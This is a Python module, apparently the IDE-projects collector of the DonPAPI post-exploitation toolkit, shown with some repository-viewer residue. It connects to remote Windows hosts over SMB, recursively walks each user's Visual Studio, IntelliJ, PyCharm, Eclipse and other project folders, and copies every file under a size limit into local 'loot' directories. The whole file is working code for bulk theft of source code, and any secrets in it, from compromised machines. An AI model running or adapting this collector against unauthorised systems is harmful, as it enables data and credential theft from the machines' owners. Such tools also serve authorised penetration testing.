72 lines
3.8 KiB
Python
72 lines
3.8 KiB
Python
|
import os
|
||
|
import ntpath
|
||
|
from typing import Any
|
||
|
from dploot.lib.target import Target
|
||
|
from dploot.lib.smb import DPLootSMBConnection
|
||
|
from donpapi.core import DonPAPICore
|
||
|
from donpapi.lib.logger import DonPAPIAdapter
|
||
|
from donpapi.lib.utils import dump_file_to_loot_directories
|
||
|
|
||
|
|
||
|
class IDEProjects:
|
||
|
user_directories = [
|
||
|
"Users\\{username}\\source\\repos", # Visual studio
|
||
|
"Users\\{username}\\workspace", # Eclipse
|
||
|
"Users\\{username}\\IdeaProjects", # Intellij
|
||
|
"Users\\{username}\\PycharmProjects", # PyCharm
|
||
|
"Users\\{username}\\AndroidStudioProjects", # Android Studio
|
||
|
"Users\\{username}\\Documents\\NetBeansProjects", # NetBeans
|
||
|
"Users\\{username}\\Documents\\Xcode", # Xcode
|
||
|
"Users\\{username}\\CLionProjects", # CLion
|
||
|
"Users\\{username}\\RubyMineProjects", # RubyMineProjects
|
||
|
"Users\\{username}\\Documents\\Qt", # Qt
|
||
|
"Users\\{username}\\Documents\\CodeBlocks", # CodeBlocks
|
||
|
"Users\\{username}\\RiderProjects", # RiderProjects
|
||
|
"Users\\{username}\\PhpStormProjects", # PhpStormProjects
|
||
|
]
|
||
|
|
||
|
def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore, false_positive: list, max_filesize: int) -> None:
|
||
|
self.tag = self.__class__.__name__
|
||
|
self.target = target
|
||
|
self.conn = conn
|
||
|
self.masterkeys = masterkeys
|
||
|
self.options = options
|
||
|
self.logger = logger
|
||
|
self.context = context
|
||
|
self.found = 0
|
||
|
self.false_positive = false_positive
|
||
|
self.max_filesize = max_filesize
|
||
|
|
||
|
def run(self):
|
||
|
self.logger.display("Gathering developement projects files")
|
||
|
for user in self.context.users:
|
||
|
for directory in self.user_directories:
|
||
|
directory_path = directory.format(username = user)
|
||
|
self.dig_files(directory_path = directory_path, recurse_level = 0, recurse_max = 10)
|
||
|
if self.found > 0:
|
||
|
self.logger.secret(f"Found {self.found} dev projects files files", self.tag)
|
||
|
|
||
|
def dig_files(self, directory_path, recurse_level = 0, recurse_max = 10) -> None:
|
||
|
directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
|
||
|
if directory_list is not None:
|
||
|
for item in directory_list:
|
||
|
if item.get_longname() not in self.false_positive:
|
||
|
new_path = ntpath.join(directory_path, item.get_longname())
|
||
|
if item.is_directory() > 0:
|
||
|
if recurse_level < recurse_max:
|
||
|
self.dig_files(
|
||
|
directory_path = new_path,
|
||
|
recurse_level = recurse_level + 1,
|
||
|
recurse_max = recurse_max
|
||
|
)
|
||
|
else:
|
||
|
if item.get_filesize() < self.max_filesize:
|
||
|
file_content = self.conn.readFile(self.context.share, new_path)
|
||
|
if file_content is not None:
|
||
|
self.found += 1
|
||
|
absolute_local_filepath = os.path.join(self.context.target_output_dir, *(new_path.split('\\')))
|
||
|
dump_file_to_loot_directories(absolute_local_filepath, file_content)
|
||
|
|
||
|
collector_dir_local_filepath = os.path.join(self.context.global_output_dir, self.tag, new_path.replace("\\", "_"))
|
||
|
dump_file_to_loot_directories(collector_dir_local_filepath, file_content)
|
||
|
|